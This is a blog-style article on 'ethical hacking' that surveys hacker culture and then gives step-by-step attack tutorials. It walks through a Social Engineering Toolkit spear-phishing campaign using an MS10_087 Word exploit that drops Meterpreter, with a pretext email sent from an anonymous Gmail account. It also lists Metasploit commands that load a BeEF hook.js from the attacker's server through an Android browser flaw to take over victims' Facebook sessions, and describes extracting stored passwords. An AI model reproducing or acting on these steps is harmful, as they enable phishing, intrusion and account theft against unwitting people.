Ethical Hacking | How to Hack
Ethical hacking refers to hacking systems to help improve them. This kind of hacking is not meant to cause problems but to find potential problems and provide solutions for them. This type of hacking is conducted by a company or an individual for the sole purpose of finding vulnerabilities and potential threats. This blog explains How to Hack passwords and facebook with Complete Guide
What an ethical hacker basically does is to try to bypass the system security and then search for any weak points that may be exploited by malicious hackers. It’s essentially like taking a new car out for a test drive and trying to find any issue that may come up. This way, developers are able to fix and modify it so that by the time it is put in place or marketed, the product is already at its best and most secure.
The ethical hacker makes a report on the processes and findings, which the company or organization will use to improve upon and strengthen its security system. This helps to lessen, if not eliminate, the potential for attacks in the future. This is a very important process for developers and organizations because security is one of the most important features that people are seeking for today.
Factors in Ethical Hacking
Hacking, as has been mentioned before, is neither always bad nor always good. For a hacking activity to be ethical, it has to have the following elements:
There should be expressed permission to prod a network and make an attempt at identifying the vulnerabilities and potential risks to security. The permission is most often best given in written form (for legalities and formalities).
Respect for the privacy of the company or of the individual. Thus, any findings should be kept confidential. Close the work thoroughly. Do not leave any loopholes or openings in the system that others may exploit. Make vulnerabilities and security issues known to the developer or hardware manufacturer. That is, fully disclosing the results of the hacking in order to help them fix these issues and strengthen their products.
Ethical hacking is something that a lot of people are dubious about. Most people are unconvinced that there is such a thing as ethics in hacking. But there is. Truthfully speaking, a lot of ethical hackers started out as malicious or black hat hackers. Also, some companies, universities, and agencies do offer legitimate hacking jobs and software development opportunities to some hackers.
Hackers are indispensable in creating secure and reliable systems. They go through numerous backdoors and holes trying to see openings or vulnerabilities. To make this point so much simpler, just think of a homeowner. He wants to make sure that his house is safe and burglarproof. So he installed several anti-theft systems like alarms and such.
No matter how much he tries to burglar-proof his home with everything from primitive traps to high tech alarm systems, the only time gets to know full well how these things work is when faced with an intruder. Imagine two scenarios.
First scenario: The owner installed all these security features and then moved into the home only to find out later that a burglar was still able to enter the premises. This placed the owner in peril because he was unable to see any vulnerability in his security system yet he placed his full trust and confidence in it.
Second scenario: The homeowner installed all available security systems in his home, but before he moved in, he hired someone who knows how a burglar works to test his security features. This “hired burglar” then acted as if truly invading this home. He used every means possible to try to break in.
If he was successful, he reports to the homeowner how he got in. What features or weaknesses did he find that enabled him to break in despite all the security system. Then, basing on these findings, the homeowner installed the necessary add-ons and reinforced these weak points to finally make it virtually impossible for anyone to break into his home without permission.
The first scenario places any software or hardware at risk for serious compromise once ii is in full use. For example, a security software that underwent a similar process as in the first scenario was installed in a facility that required the highest possible security, like a bank or a museum of rare and valuable artifacts.
That would be placing all the valuable items at high risk because there is a high potential that hackers out there would find some opening or weakness they can exploit in order to get in and destroy the security system. But if the second scenario was performed, there will be higher confidence in the security system because it has been subjected to more rigorous and real-life testing.
This is just one of the many contributions of hackers in the development of software and hardware. Their findings are invaluable that help organizations and developers to improve and strengthen their systems. Hackers who wish to be known as ethical hackers can take a test and be certified as a CEH or Certified Ethical Hacker. This way, organizations needing their input would know they can be trusted to do the job.
The certification is given by the EC-Council (International Council of E-Commerce Consultants). Interested individuals can take the test for $500. The test has 125 items, consisting of a multiple-choice type of questions for the version 8 of the test. The version 7 of the certification test has 150 multiple choice-type questions.
Where Hackers Attack and How to hack.
At this point, you may have listed down all the privacy policies, unsecured hosts and their functions, and all the applications that you have in your computer in order to find out from which direction would an attack against you would probably come from. If you have not done so yet, it’s okay. Just make sure that you have made it a point to run antimalware or anti-Spybot programs in your computer to learn if it contains any program that may be spying on your activities.
When you take the step to assess the vulnerabilities of your network and your computer, you will definitely want to learn the favorite places to attack from hackers themselves. You can actually search hacker boards online to have an idea about their favorite methods of attacking, or you can make use of the following databases that show where computers are typically most vulnerable:
1.NIST National Vulnerability Database
2.US-CERT Vulnerability Notes Database
3.Common Vulnerabilities and Exposures
By learning common vulnerabilities, you will be more aware of the most classified vulnerabilities that are repeatedly being exploited by malicious hackers. That would give you a good jumpstart into knowing what area of your network or computer you should be testing for weakness first.
If you do not want to look at the most common computer vulnerabilities and jump right into testing your own system, here are the options that you have:
1. Automated testing – This is ideal for those who want quick reports on vulnerabilities as often as they want.
2. Manual testing – This would entail manually connecting to ports, and would be a great time to learn which ports are vulnerable. You will get results that are listed in the databases mentioned above, but that would give you an idea of how these vulnerabilities are discovered.
Tools you can Use
There are several ethical hacking tools that are available online that will help you discover vulnerabilities in your system. Most of the tools that you will find would allow you to exploit specific types of vulnerabilities, so they may not show you all the weak points in your system. However, you may want to use them if you have managed to seek all the possible weak points and would want to zero in on specific vulnerabilities for testing.
A great tool that you can purchase for scanning vulnerabilities would be the QualysGuard Suite. It serves as both a port scanner and a vulnerability scanning tool. It runs in a browser, which means that you would not need a second computer to run its tools for scanning – just type in your IP address and it will promptly do the scan. You can also install another software from the same manufacturer that would allow you to scan internal systems. Once you are done, you can choose to validate the results.
Once you have discovered security flaws in your computer system, you can easily do the following hacks:
1.Access other systems that are still connected to yours
3. Find sensitive files and access them
4. Send an email as the administrator
5. Start or stop applications or services
6. Get access to a remote command prompt
7.Gain more information about different hosts and the data they contain
8. Upload a file remotely
9.Launch a DoS (Denial of Service) attack
10.Perform SQL injection attack
You can use software known as Metasploit in order to demonstrate how you can do all these by achieving a complete system penetration. By doing so, you can see how far a malicious hacker can do once he is able to know all the vulnerabilities of your computer.
Understanding Social Engineering
Not all vulnerabilities are found within a computer. If you are managing a network of computers and you have made it a point that there is no hole in the security framework and you are repeatedly testing for vulnerabilities, then malicious hackers can go beyond the computer in order to find their way in and launch an attack. More often than not, the way that they find themselves in your network is not by remotely probing your computer for weaknesses. They can simply ask you what your password is to let themselves in.
Social Engineering Explained
Social engineering is the process of getting valuable information about a computer system and its network through the user. You can think of this practice as hacking the people who use the device that they are hacking.
Social engineering hackers typically pose as another person to obtain the information that they need. Once they get the information that they need, they can simply log in to their target computer and then steal or delete the files that they need. Normally, they will pretend to be the following:
1. Fake support technicians
They may pretend to be technicians who would tell you that you need to install or download a program to update any existing software in order to remotely control your computer.
2. Fake vendors
They may claim to represent the manufacturer of your computer or an application that you are using and then ask for your administrator password or the answer to your security question in order to grant themselves access.
3. Phishing emails
These may be sent in order to get passwords, user IDs, and other sensitive data. They may look like an authorized email sent by a company that you are subscribed to or a web form that may dupe you into putting personal information.
4. False employees
These people may ask to obtain access to a security room or request for access to a computer in order to have physical access to files that they need.
Social engineering attacks can be slow and simple, but they are very effective. They are often designed to avoid suspicion. They only gather small bits of information and then piece them together in order to generate a map of how the networking system works and then launch massive infiltration. However, if a social engineer realizes that his targets can be easily lured into providing information, gaining a password can be as quick as asking for information over a quick phone call or through a short email.
Why Social Engineering should be Prepared
Any malicious hacker who watched corporate espionage films can deduce that any organization or person who uses technological devices to communicate and send data prepares for this kind of attack the least. Most people are not ready for this kind of manipulation, which makes it very effective.
Social engineers know that most organizations do not have any formal and secure data organization or any incident response plan. A lot of computer users are also not knowledgeable about authentication processes of social media accounts and all the possible ways to possibly retrieve a lost password. Malicious hackers always take these factors into consideration, especially when they are aware that it is a lot easier to retrieve information this way.
Once a social engineering attack becomes successful, a hacker can get the following information:
1.Any user or administrator password
2.Security badges to a computer server room
4.Unreleased intellectual property files such as designs and research
5.Customer lists or sales prospects
Also, take into consideration that unknowingly granting access to social engineers may also be in the form of unknowing or naïve computer users who forget their responsibility in maintaining the security in a shared network. Always remember that having a secure firewall and networking system may be useless against hackers if the user himself is vulnerable to a social engineering attack.
A social engineering attack is done through the following steps:
1.Conduct research and find the easiest way to infiltrate
2.Build confidence and trust
3.Create a relationship with target computer user
Means to getting Information
If it is not possible to create rapport with a target computer user, then it would be easy to phish for information instead before launching a large-scale social engineering attack. Gathering information can prove to be easy, given the nature of computer users today – it is rather easy to get phone numbers, employee list, or some personal information about the targeted user through social networking sites. It is also easy to find information through public SEC filings, which could display a lot of organizational details.
Once a malicious hacker gets a hand on this information, they can spend a few dollars on doing a background check on the individuals that they are targeting in order to get deeper information. If it is difficult to get useful information using the Internet, a malicious hacker may choose to do a riskier method called dumpster diving. Dumpster diving is literally rummaging through the trash of their target in order to get the information that they need.
While this method can be messy, there are a lot of gems that a hacker can discover through discarded paper files. One can find credit card information, subscriptions, phone numbers, addresses, important notes, or even password lists. They can even make use of discarded CDs or hard drives that may contain backup data.
What Makes a Social Engineering Attack Powerful?
You may think that criminal hackers are going low on technology and resources when they use social engineering hacks to gain access to your protected files. However, social engineering hacks are very powerful because they are means to hack the most important component of a computer’s security – you.
These attacks are, in fact, psychological attacks – instead of attempting to use numerous hacking tools to manually decrypt any password in a world of advanced security protocols, hackers are more inclined to let their own targets do the job for them instead.
The only goal that they have when it comes to social engineering is this: create a scenario that is convenient for their targets, to the point that they would be willing to loosen their security in exchange for something that they desire. An example of a good social engineering scheme is a type of the evil twin hack, which makes targets believe that they are connecting to a legitimate free wireless internet, in exchange for their passwords.
Why do these tricks work on most people? The reason is that people are not really that careful when it comes to giving away their information. For most cases, there’s not even any need for a fake company personnel to contact a hacker’s target in order to get privileged information – you would be surprised that there are just too many people that would immediately create accounts on an unverified landing page using the password to their private emails.
How does that happen so easily? The reason is this: when you are prompted to create an account using your email address as the username, it is very likely for you to use your email’s password as your new password for this particular account that you are trying to make.
For criminal and ethical hackers alike, there is something embedded in Kali Linux that proves to be very useful – Social Engineering Tools (SET). These tools are developed in order to create the following social engineering hacks:
2.Mass mailer attack
3.Infectious media generator
4.Arduino-based vector attack
5.SMS spoofing attack
6.Wireless Access Point
7. Spear-Phishing Attacks
All these attacks are designed to make you do what social engineering wants you to do: give out information or create an action because of a legitimate-looking request.
If it is hard to obtain information, one can simply use sleight of hand or gleaning techniques to retrieve passwords. One can make effective password guesses by looking at hand movements when someone enters a password. If one gets physical access to the computer, it is also possible to insert a keylogging device by replacing the keyboard or placing a device between the keyboard and the computer.
Hacking Someone with a Phishing Email
How easy is it really to scam a person using a phishing email? A phishing email normally contains the following components:
1. A reliable-looking source of the email, such as a co-worker, that will serve as bait.
2.A legitimate-looking attachment, which would serve as the hacking tool to obtain the information that a criminal hacker needs.
3. Great timing, meaning that the email should be sent during a reasonable time of the day in order for the target to be convinced to click on the attachment.
Given the right tools, any criminal hacker can send a legitimate-looking email, complete with an attachment that looks trustworthy. To create a phishing email, you only need to follow the following steps:
1. Get Kali Linux and pull up SET (Social Engineering Toolkit)
This Toolkit would show you different services that are used for social engineering hacks. To do a phishing attack, choose on Spear-Phishing attack.
Note: Why Spear-Phishing?
When you think of phishing as a hacker attack, its method is to cast a large net over your targets, and then being able to get random people to give you the result that you need. With spear-phishing, you get to target a specific range of people and obtain an exact result that you desire.
When you click on spear-phishing from the menu, you can choose to do the following:
1. Send a social engineering template
2.Create a mass email attack
3.Create a FileFormat payload
For this example, choose FileFormat payload. This would allow you to install a malware in the target’s system that would serve as a listening device for you to get the information that you want remotely.
2. Now, choose the type of payload that you want to attach in your target’s computer.
The SET offers a good range of file formats that your target would see once they receive the email. You would even see in the list that you can choose to send a PDF-looking file (that actually has an embedded EXE) with your phishing email!
For this example, select the Microsoft Word RTF Fragments type of attack. Also known as MS10_087, this type of attack would send a Word file to your target. Once clicked, it would automatically install a rootkit or a listener on your target’s machine.
3. Now, select the type of rootkit you want to install. If you want to have full control of your target’s system, you can choose to install a Metasploit meterpreter. This would allow you to make a variety of commands remotely that your target computer would follow.
4. Since you are already set on the type of results that you want to get from this attack, you can now start creating the file. Now, you need to create a port listener and proceed to create the malicious file that you want to send. By default, the SET would be creating a file called filetemplare.rtf.
Since it is probably not convincing enough for a target to click on it, you can choose to rename it as, say for an example, SummaryReport2015. By renaming your file as something that your victim should be expecting in his email, you elevate the rate of success of your attack.
5. You are now ready to send the malicious file masked as a Word document. In order to do this, you would need to create the first layer of your attack, which is the email body. SET would offer you a generic email template to use. However, if you want to be sure that your target would find nothing suspicious in your email and proceed with downloading the malware that you have just created, select “one-time-use email” option.
Now, make your email more inviting. Choose to create the email body in HTML to make it look more legitimate and original. Once you are done typing the email body, hit Ctrl + C to save what you just wrote.
Here is an example of a good phishing email body: Dear Mr. _____________
Kindly find attached the summary report of our last meeting. Should there be any questions, please feel free to ask.
Of course, great phishing emails would depend on the targets that you are sending to. It would be great to check the background of the person that you are trying to hijack to ensure that you are spoofing the right credentials. For this example, a good use of Facebook and LinkedIn would provide you the information that you need.
6. Once you are done creating your email, it is time to send it to your target. You have two options on how you are going to send it: (1) From a Gmail account, or (2) Straight from SMTP server.
You would most likely want to send it from a legitimate-looking Gmail account, based on the names that you know should be important to your target. Of course, do not forget to create an anonymous account on Gmail for this to work. Once you are all set, SET would be sending the phishing email, complete with the malicious file, to your target.
Ways to Prevent Social Engineering
You may realize that it is quite easy for any hacker to obtain classified information or even take control of your entire device once they have an idea of what is going on in your daily life. While the times make it necessary for you to disclose a portion of your life online, there are plenty of ways on how you can prevent hackers from taking over and stealing your data.
Based on the example that was just given, a good firewall and an antivirus program would be able to detect if there is any installed payload in the attachments that you are receiving every day. Of course, a hacker would be able to simply recode the file attachment to make it undetectable by current virus scanners.
For that reason, computer security should not be left solely to programs that you have, because they can also be breached. In order to create a security fortress, you would also want that the users of your computer network are not hackable themselves.
Information security personnel always advise that computer security should feel like a candy – hard on the outside and soft on the inside before one reaches the core. It is the responsibility of all computer users to secure their firewalls and make sure that there is no vulnerability in their computers. It is also important for computer users to make it a point to follow safety protocols when it comes to using a computer and giving out information.
Every computer user should learn how to:
1. Make sure that there is no one around when entering passwords
2.Learn all authentication policies when it comes to changing passwords
3.Destroy all paper copies of sensitive information to prevent dumpster diving
4. Choose passwords that cannot be easily guessed through all information provided in social media
5. Make sure that only authorized users have access to computers
6.Refrain from providing password or authentication information over emails or phone calls
7. Refrain from sharing password information to anyone, including families and friends Now that you know how to protect yourself from social engineering, you have better information about physically protecting your computer from any unauthorized user.
Protecting your Passwords
Password hacking is considered the easiest way to hack into a computer system online. If you know how to hack a password, then you can easily infiltrate another computer’s Wi-Fi access and take control of another person’s internet connection, or even take control of a person’s online accounts and retrieve sensitive information. Passwords are easy to break once you know how they are encrypted, or you have a good guess on what they are.
The weakness of passwords lies in its very nature, which is secrecy. Passwords are normally shared among computer users especially when one person allows other users to use a personal computer, especially when the purpose is to share files among different people and skip sharing files over a network.
Always remember that knowing a password makes one an authorized user of a computer. The tough side of making passwords the sole basis of network security is that passwords can be easily passed from one person to another, and it is hard to track who has that information. Sometimes, password sharing is intentional, but there are many times that it is not.
What Makes a Password Weak?
There are two factors that may cause a password to be easily hacked by any malicious user:
1. User or organizational vulnerabilities
This means that there are no password policies that are employed to make it harder to guess, or that users do not care for the password’s use for security.
2. Technical vulnerabilities This means that passwords that are being used have weak encryption policies, or that the database that stores them is unsecured. A weak password has the following qualities:
1.Easy to guess
2.Reused over and over again for different security points
3.Stored in unsecured locations
It is the nature of many computer users to make passwords convenient, and they often rely on their minds in order to remember them. Because of that, people often choose passwords that are not only easy to remember but also contain a lot of clues that they can see in their immediate environment. For added assurance that they will definitely remember passwords for easy access, they would also want to write it down where they can easily see it.
If a computer user would choose a more difficult passphrase to guess, it can still be easily hacked by targeting the weakness in its encryption scheme. Computer users and vendors often think that a password that is long and difficult to guess because of the string of characters used is not prone to attacks. However, note that when the encryption is weak, it can be easily targeted by a simple cracking attack.
There are over 6000 password vulnerabilities known today, according to the National Vulnerability Database. That number is still growing as hackers discover more sophisticated methods to get past encryption methods. The most popular and easiest ways to uncover a password is through social engineering, cleaning, and using a keylogger, but there are different other methods to remotely obtain a password. Here are some of the tools that are used to get passwords without having to be near a target computer or having physical access to it:
1. Elcomsoft Distributed Password Recovery – This tool cracks Microsoft Office encryption, PKCS, and PGP passwords. This allows you to use GPU acceleration that speeds up the hacking process up to 50 times.
2.John the Ripper – This tool cracks hashed Windows, Unix, and Linux passwords.
3.Proactive System Password Recovery – This tool recovers any locally stored Windows, WPA or WEP, SYSKEY, and VPN passwords
4. Cain and Abel – This tool cracks LanManager, Windows RDP, Cisco IOS, and other types of similar passwords.
5.Proactive Password Auditor – This runs using brute-force, dictionary, and rainbow attacks and can extract NTLM and LM password hashes.
Countermeasures Against Password Cracking
In order to prevent unauthorized users from uncovering passwords, here are some tips that you can use to thwart any attack designed to crack authentication:
1. Use switches on networks
Hackers typically make use of network analyzers to detect network cards that have activities. To prevent that from happening, you can use programs like sniffdet in order to uncover if someone is trying to sniff out information from your ports.
2. Make sure that unsupervised areas do not have network connections
3. Do not let anyone have physical access to your network connection or your switches.
4. Make sure that you use updated authentication policies on your network in order to make sure that you are using better encryption that hackers will find hard to attack.
The concept of Free Access in Hacking
It may come as a surprise but hackers also have their own set of ethics. There are 5 general principles or tenets that great hackers follow regardless of what “colors” may be. These are sharing, decentralization, openness, world improvement, and free access to computers.
Free access to computers
This is one of the firm beliefs that hackers – and non-hackers alike- are trying to uphold. Access should be unlimited and total, extending from access to computers and to other things that can help an individual learn about how things are in the world. That’s accessibility to information that everyone should be privy to.
Computers are vital to hackers. It’s like the legendary Aladdin’s lamp they can control and use as vessels to further their learning, skills, and other personal goals. A computer is like an artificial limb that helps hackers live a life that is more focused, with direction, adventurous, and enriching.
Even a small computer can be used to access vast amounts of power and influence all over the world. And this exhilarating experience is something that hackers from all over the world wish everyone to tap into. It isn’t purely for malice and spreading terror and inconvenience to others.
It is a rich ground for creativity and for contributing to the advancement and innovation of technology that can ultimately benefit people from all over the world. For instance, hackers may make internet access more available to people, even in remote places without having to pay exorbitant amounts or be at the mercy of large corporations. Hackers live by the idea that people, regardless of age, sex, race, education, and economics should be able to have access to computers as a means to see, learn and understand more about the world.
For hackers, access to information is crucial. The skills and capabilities are developed by building upon pre-existing systems and ideas. The access enables hackers to take systems and applications apart, fix them, or improve upon them. These also help in learning and understanding how things work and what can be done to improve efficiency and function. Access is only not for the benefit of hackers (whatever color they may be). It also is a very important driving force in the expansion and faster improvement of technology.
Free access to information
This concept is directly related to the desire for full, unlimited access. Information should be accessible to enable hackers to work on, fix, improve and reinvent various systems. Also, the free exchange of information enables the expression of greater creativity. People can convene and share their ideas that can help in improving or advancing systems.
Systems can also benefit from a less restrictive information flow, which can be referred to as transparency. The reference to “free” access is not a reference to the price. It is understood that some information may have to be paid for certain prices, based on how valuable they are and how many people have access to it. “Free” in this context refers to unrestricted access.
Mistrust of certain authorities happens for several reasons. One of the biggest reasons is that the authorities, and some certain laws, can restrict access. In some places, certain authorities, laws, and regulations make it almost impossible for hackers to operate. This blocks free access to information, and at times, the free exchange of ideas.
This led to one of the fundamental beliefs of the hacking world that bureaucracies are a flawed system that impeded growth and advancement. Whether it exists in universities, corporations or in government, it is a huge roadblock in the road to progress.
A Few More Issues
One of the other attractions of the hacker community is its embracing character. They do not judge others based on age, ethnicity, education, sex, position and other similar categories that the rest of society follow. What matters most is one’s hacking skills and achievements.
Hackers do not discriminate, which makes their community very attractive for people who have the skill but are cast aside by governments, corporations, etc merely because of what they are (e.g., sex, race, education, social positions, etc). Anyone can be a hacker and be a good one at that. It does not have to be based on any other criteria than on skills, creativity and getting results.
That being said, hackers from all walks of life from all over the world are welcome in the community. The only thing required in order to be a part of the community is the willingness to share and collaborate. Hacking culture has survived for this long despite having to go underground for most of the time and dodging other people (e.g., authorities, corporations, governments, etc) because hackers are willing to share and collaborate. This becomes ever so true when times are tough.
The ultimate determinant is the hacking skills. This fosters faster advancement in terms of hacking and in software development. For example, a 12-year old kid has been accepted by a hacker community, when all other non-hacker students have rejected him. This kid proved to be very talented, contributing significantly to technology and software development.
Hackers are not all about destroying systems and leaving them in unusable, unredeemable tatters. They recognize there is beauty and art in programming and computer use. Innovative techniques coming from creative minds that were given the right opportunities can help in advancement, progress, and improvement.
Hackers can help improve existing applications, create better applications, and point out vulnerabilities that can help make cyberspace a more attractive and more fun environment in which to work.
Beauty and art are not just in the output, results, or applications; these can also be found in the program codes. It is not just a string of binary, characters, and literals; it is carefully constructed, artfully arranged, and finalized to produce a symphony. A redundant, unnecessary cyclically written code is considered a poor, sloppy, and unprofessionally constructed program.
The most efficient and most valuable program is one that performs complicated tasks and produces reliable and efficient results or actions with a few instructions. It should also save as much space as possible. In today’s world, the less space required to run a program, the more desirable and sought after it becomes.
And hackers come in very handy for this purpose by pointing out vulnerabilities, redundant or unnecessary files or codes that slow down programs. In fact, in the early days of hacking, they had some sort of “game” or race on how much space can be saved from programs.
Culture of Sharing
The hacking community has lasted this long because of the concept of sharing. This has been a fundamental element in hacking, from its early days until the present. The ethics and culture of open sharing and collaboration have made the hacking culture flourish and improve over the years. The software is commonly shared, which included the source codes. Sharing is the hacker norm. It is something expected in the culture of non-corporate hacking.
The culture of sharing among hackers started at MIT when hackers would develop programs and share the information (including source codes) to other users. This allows other users to try to hack the newly develop0ed program. If the hack was considered good, then the program is posted on the board.
This allows others to improve it and add or build programs upon it. The offshoot programs and improvements were saved in tapes and then added to a program drawer that other hackers can access.
It’s like building a free library that any hacker can access and use anytime for learning, inspiration or innovations. Hackers would open these program drawers, choose any program, and then add or “bum” to it to improve it. “Bumming” is a hacker term that refers to making a program code more concise. This enables programs to take up less space, perform more complex tasks using fewer instructions, and become more simplified. The memory space saved allows for the accommodation of more enhancements by other hackers.
This was during the early days of hacking and it has continued up to this day. This also opened the hacking community to a wider population, allowing more people to be able to learn and share their ideas. This contributed to several advancements that would have taken more years to develop if not for the combined efforts of hackers everywhere.
The “Hands-On” Imperative
This is the hacker community’s common goal. The Hands-On Imperative is what drives the hacking community. The community believes that vital lessons about systems and about the world can only be fully appreciated by taking things apart and observing how each component works. Then, this knowledge becomes the basis for creating something new, more interesting and innovative.
To employ this imperative, there must be free access sharing of knowledge and open information. In the hacking world, unrestricted access allows for greater improvements. If this isn’t possible, hackers would find ways to work around any restrictions. There is a “willful blindness” among hackers in their single-minded pursuit for perfection. This may look like deviant behavior, but it does prove to produce some amazing results that the whole world benefitted from.
This is a prickly issue but the hacking community stands by the concept that the end can justify the means. There are, admittedly, quite a number of remarkable and very innovative results from the hacking world, despite, well, having to break a few rules. The general public has experienced some advantages, too, from some of the hacking activities. The truth is hacking is not all bad, but it isn’t all good, either. It is both a selfish, willful noncompliance with certain rules and a something like a Robin Hood kind of thing.
For instance, hackers in MIT, in the early days of hacking, had to work around login programs and physical locks. The entire operation was not something malicious. There was no willful intent to harm any of the systems or to inconvenience other users. It was a means to improve, build upon and perfect existing systems. This is in contrast with the usual hacker activities that get in the news, where hackers crack security systems merely to wreak havoc, create cyber vandalism or to steal information.
Hacking as a Community and Collaborative Effort
Becoming a hacker means becoming a member of a community. It entails collaborating with other people, either to share or to obtain information and ideas. Each hacker generation had communities, mainly based on geography, which enabled them to share and collaborate. For instance, hackers at MIT developed a community within their labs, where they spent most of their time working on computers.
The second-generation hackers (who were more on hacking hardware) and the third generation hackers (who were more into hacking games) were able to develop their own communities in the famous Silicon Valley.
This was also home to the popular Homebrew Computer Club and People’s Computer Company, which produced big names in the technological world such as Bill Gates. There were also the labs like Bell, the one at MIT, UC Berkley, and LCS labs.
These communities provided avenues where budding hackers were able to join networks, collaborate with others to improve their ideas, and eventually to get started on their own projects. This was where they found others that can help them improve or create certain portions of their projects that they find challenging to do on their own.
The numerous tech companies and software developers that changed the world mostly came from these communities. They were the movers and shakers of past decades that have set up many of the technological advances that the world enjoys today.
Some of these are the more accessible and widely available Internet, hardware and software innovations such as smartphones, faster and more efficient gadgets, groundbreaking software that made life so much convenient and others.
Today, hackers still have a community and continue to collaborate. The difference is that these are no longer geographically limited. Before, hackers had to meet personally, such as in Silicon Valley. Today, anyone from anywhere in the world can work with others, even from thousands of miles away. Collaborations are mainly through communicating over the Internet.
Before, Internet access was limited to large universities, some governments, and a few large corporations. This made collaborating cheaper and more sustainable by actually meeting in person, sharing and collaborating within a limited geographical location. With the advent of affordable Internet access, more and more people are able to join the community. The coverage of the hacking community has extended widely and has included more people from all walks of life, from all over the world.
Facebook is probably one of the most secure sites that exist today, which makes it an ideal place on the web to share information about yourself, or anything that is on your mind. However, Facebook can also be a place where the most sensitive information is stored (thanks to chat boxes), and a hacked Facebook page may also mean the fall of a brand or the reputation of its corporate users.
If you are working as part of your company’s information technology security team, Facebook may be one of the main things that you must protect in order to ensure that your job stays afloat!
Can You Really Hack Facebook?
Facebook itself has deep encryption when it comes to passwords – there is no way that you can know what your password is in any case you forget it because Facebook only has a protocol of letting you know that your password is right, but it offers no means of letting you see it.
What does this mean? Facebook offers you two options when it comes to entering a password for a specific account:
1. You would have to enter it yourself and then let your device store that information so that you can enter your account without having to enter your username and password again
2. You would have to reset your password in any case you forgot it and you would need to sign in from another device
However, this does not mean that hackers really are in a total dead end when it comes to knowing a Facebook password. In this blog, you will know some of the known ways of hacking a Facebook account by exploiting the vulnerabilities of devices and applications that have access to it.
Using the Android’s Stock Browser Flaw
Google has been aware of the stock Android browser’s security flaw and has made the necessary patches. However, the browser isn’t automatically patched in most Android systems nowadays. Because of this, the following hack would work on most Android devices.
The term Same Origin Policy (SOP) is one of the many important security measures that browsers need to have. This policy means that browsers should be designed in such a way that web pages have means to load any code that is not integrated into their own resource. By having this policy, website owners would have the peace of mind that no criminal hacker would be able to inject codes without having to secure their authorization first.
Unfortunately, the Android browser that comes installed by default does not enforce this security policy adequately. Because of this, it is possible for a hacker to get his hands on all pages that are open using this browser. It also means that once an Android user uses this browser to go to a trap website which would inject a code, it would always be possible to access all the sites that are opened in this default browser. This method, as you have already read in the previous blog, is called phishing.
How to Phish for Facebook Details
In order to create a phishing trap, you would need to install the software called Kali Linux. Within this system, you would find two tools, BeEF, and Metasploit, which are both necessary for creating a phishing scam. Follow the steps to start hacking:
1. Pull up Metasploit
Fire up Kali Linux and key in the following command: kali > msfconsole
You would see a screen that says that you are about to set up listeners, landing pages, or emails for phishing. If you want to learn more about Metasploit, you can visit Metasploit: Penetration Testing Software | Rapid7.
2. Search for the exploit
Now that Metasploit is running, find the program that you need to exploit. In order to do that, key in the following command: MSF > search platform: android stock browser You would only get one module for the exploit, which is: auxiliary/gather/android_stock_browser_uxss
Load this module by typing: msf > use auxiliary/gather/android_stock_browser_uxss
3. Display the information that you need to plan your exploit
After loading the module, you would have to find the information that you need on how to exploit the stock browser. To do this, key in: msf > info
4. Display the options
You would need to see all the options that you need in order to make the module work. To launch the module, you would need to set the REMOTE_JS.
5. Launch BeEF
Once you fire up this software, you would see a brief tutorial on how to hook a browser. On the Getting Started page, you would see links on how to point a browser to another page, plus other tutorials. Leave the BeEF program running.
6. Set the REMOTE_JS to BeEF Hook
Go back to Metasploit and set the REMOTE_JS to the webpage hook on BeEF. Make sure that you use the IP of the BeEF that you are running. To do this, use the following command string:
msf > set REMOTE_JS http://(IP address of the BeEF’s server)/hook.js Now, set the URIPATH to the root directory. Type the string:
msf > set uripath /
7. Fire up the server Key in the following command: msf> run
Doing this would allow you to start the Metasploit’s web server and allow you to serve on the BeEF hook that you have set a while ago. After doing so, anyone who navigates to the website would have their entire browser hooked on BeEF.
8. Try to go to a website from the stock android browser
9. Check if the browser is authenticated to Facebook
Go back to BeEF and navigate towards the B tab. Go to the Network folder and click on the Detect Social Networks. Clicking on this command will allow the software to see if the target is authenticated to Twitter, Facebook, or Gmail. Click on the Execute button to launch the command.
BeEF would return to you with the results. If the target has not authenticated the browser to Facebook, all you need to do is to wait for the target to connect to Facebook. Once he does, do this command again. Once his Facebook has been authenticated, you can direct a tab to launch the user’s Facebook page!
Make Use of the Cache
Another hack that you can use to pull up another person’s Facebook account makes use of the fact that most people tend to store their passwords on the devices that they are using. Since there is a lot of people that do not want to fill in the username and password forms over and over again, there is a big chance that you can find the stored passwords for all accounts of a target user somewhere on his computer.
If the target user has the habit of clicking Remember Me on all sites that he visits so that he won’t have to re-authenticate again and again, then it is very likely that you can find all his passwords in one sitting.
At this point, you would need to remember one golden rule in hacking – if you can get physical access to the device that you intend to hack, then it is possible for you to get all the passwords that you need. The key to this is to know where operating systems and browsers would normally store passwords and know how to crack hashed passwords when you spot them. For example, Mozilla browsers are known to store user passwords for Windows users at this path:
The passwords that you would see here would only be encrypted as Base 64 encoding, which you can manually decode. You can also use a software similar to PassWordViewer to decode this type of encryption with ease.
Use the Elcomsoft’s Password Extraction Tool
Elcomsoft is a known decryption company whose main goal is to create and sell software that is designed to crack different types of password encryption. One of the hacker favorites from this company is the iCloud hack tool that recently revealed nude photos of celebrities that are supposedly locked down on the iCloud server.
Elcomsoft is also the known developer of the Facebook Password Extractor, which exploits the possibility that users have clicked on the Remember Me button to authenticate their profile using a Windows device. To use this tool, you would need to have physical access to the device that your target is using.
If that is not possible, you would need to hack into the target system and upload this tool. If that is also not possible to accomplish, you can download the user’s browser password file that is stored in the computer and then uses this tool locally. This tool would be able to work on the following:
1.Early Google Chrome editions, up to Chrome 11
2.Microsoft Internet Explorer versions up to IE9
3.Mozilla Firefox editions up to Firefox 4
4.Apple Safari editions up to Safari 5
5.Opera editions, up to Opera 11
At this point, you would realize that the workaround against these attacks is fairly simple: since attacks that are aimed to hack your Facebook account would only work if hackers have access to your devices, the first rule to Facebook security is to prevent anyone from having physical access to your devices. It would also be a good idea to start upgrading your web browsers for better encryption policies for your passwords, just in case you would need to part with your devices.
Another great security measure is to keep your passwords safe by avoiding any means of storing them in your devices. That means that you would need to stop the habit of clicking Remember Me on any website that you log into. This way, you would never have to worry about people getting their hands on your social media accounts while your device is away.
Understanding a Denial of Service Attack
At this point, you know that there is a lot of things that a hacker can do once he is able to set-up shop inside your port. You are now aware that apart from hacking Wi-Fi passwords, hackers can also prevent users from using their own connection. Now, take a look at another attack that hackers love to perform against target users: the DoS attack.
What is DoS?
DoS simply means Denial of Service – as its name implies, its goal is to prevent users from making use of any server or access point. It is also fairly straightforward and simple to do – all you need to launch this type of attack is to find the service that you want to exploit, and then overwhelm it with packets until you bring it down.
